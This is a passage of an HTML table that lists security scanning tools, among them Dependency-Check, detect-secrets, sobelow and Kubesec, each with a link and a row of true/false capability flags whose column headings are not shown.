href="https://github.com/jeremylong/DependencyCheck">Dependency-Check</a></td><td>false</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td><a href="https://github.com/Yelp/detect-secrets">detect-secrets</a></td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td><a href="https://github.com/nccgroup/sobelow">sobelow</a></td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td><td>false</td><td>false</td></tr><tr><td><a href="https://kubesec.io/">Kubesec</a></td><td>false</td><td>false</td><td>false</td><td>false</td><td>true</td><td>false</td><td>false</td><td>false</td></tr></tbody></table>

